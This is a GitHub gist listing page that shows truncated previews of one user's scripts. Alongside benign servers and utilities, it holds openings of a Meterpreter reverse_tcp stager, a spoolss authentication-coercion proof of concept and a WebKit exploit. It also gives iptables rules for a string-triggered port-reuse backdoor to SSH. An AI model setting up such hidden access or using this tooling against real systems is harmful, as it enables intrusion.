This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| from pyftpdlib.authorizers import DummyAuthorizer | |
| from pyftpdlib.handlers import FTPHandler | |
| from pyftpdlib.servers import FTPServer | |
| def main(): | |
| # Instantiate a dummy authorizer for managing 'virtual' users | |
| authorizer = DummyAuthorizer() | |
| # Define a new user having full r/w permissions and a read-only |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ | |
| # generate server.xml with the following command: | |
| # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
| # run as follows: | |
| # python simple-https-server.py | |
| # then in your browser, visit: | |
| # https://localhost:4443 | |
| import BaseHTTPServer, SimpleHTTPServer | |
| import ssl |
Dliv3
/ meterpreter_reverse_tcp_stager.asm
Last active
August 23, 2021 02:26
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; reverse_tcp shellcode: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_tcp.rb | |
| ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm | |
| ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm | |
| ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_recv.asm | |
| ; asm_block_api for windows x86: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/block_api.rb | |
| ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm | |
| ; hash算法&预定义好的各种函数的hash值: https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/hash.py | |
| ; PE结构: https://docs.microsoft.com/en-us/windows/desktop/debug/pe-format | |
| ;《0day安全:软件漏洞分析技术》92页 | |
| ; https://blog.cob |
Dliv3
/ meterpreter_stage_bootstrap.asm
Last active
January 5, 2019 09:44
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; meterpreter部分 | |
| ; https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/meterpreter_loader.rb | |
| ; https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reflectivedllinject.rb | |
| ; http://imosin.com/2017/12/22/meterpreter-think/ | |
| ; https://www.freebuf.com/articles/system/53818.html | |
| ; https://bbs.pediy.com/thread-247616.htm | |
| 003d0000 4d dec ebp ; M | |
| 003d0001 5a pop edx ; Z | |
| 003d0002 e800000000 call 003d0007 |
Dliv3
/ proxy_pool.py
Created
January 11, 2019 03:44
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| # https://github.com/jhao104/proxy_pool | |
| import requests | |
| import time | |
| def get_proxy(): | |
| return requests.get("http://127.0.0.1:5010/get/").content | |
| def delete_proxy(proxy): | |
| requests.get("http://127.0.0.1:5010/delete/?proxy={}".format(proxy)) |
Dliv3
/ iptables_port_forward.sh
Last active
January 28, 2019 13:35
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://www.freebuf.com/articles/network/137683.html | |
| # 端口复用链 | |
| iptables -t nat -N LETMEIN | |
| # 端口复用规则 | |
| iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22 | |
| # 开启开关 | |
| iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT | |
| # 关闭开关 |
Dliv3
/ qemu-2.7.0-aslr_heap_pie_nx_wxorx_mmap.patch
Created
March 20, 2019 07:52
— forked from grimmlin/qemu-2.7.0-aslr_heap_pie_nx_wxorx_mmap.patch
Qemu aslr, heapaslr, pie, NX and W^X implementation (NX only for arm and mips atm)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| diff -Naur qemu-2.7.0.orig/cpu-exec.c qemu-2.7.0/cpu-exec.c | |
| --- qemu-2.7.0.orig/cpu-exec.c 2016-09-02 17:34:17.000000000 +0200 | |
| +++ qemu-2.7.0/cpu-exec.c 2017-01-19 09:34:00.817088525 +0100 | |
| @@ -33,6 +33,9 @@ | |
| #include "hw/i386/apic.h" | |
| #endif | |
| #include "sysemu/replay.h" | |
| +#include "syscall_defs.h" | |
| + | |
| +extern int do_nx; |
Dliv3
/ dementor.py
Created
June 20, 2019 01:56
— forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |
Dliv3
/ pwn.js
Created
July 1, 2019 03:27
— forked from stek29/pwn.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // a bit more annotated stage2 (from fakeobj/addrof to rw) | |
| // source: https://github.com/phoenhex/files/blob/master/exploits/ios-11.3.1/pwn_i8.js | |
| // useful resources: | |
| // webkit sources, lol | |
| // http://phrack.org/papers/attacking_javascript_engines.html -- bit outdated -- info about spectre mitigations/gigacage is missing | |
| // https://labs.mwrinfosecurity.com/blog/some-brief-notes-on-webkit-heap-hardening/ -- tldr on gigacage | |
| // thx _niklasb |
Dliv3
/ jadx-all.sh
Last active
January 2, 2020 15:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| input=$1 | |
| output=$2 | |
| echo "[*] decompiling jars in $input to $output ..." | |
| input_jar=`ls $input` | |
| for i in $input_jar |
OlderNewer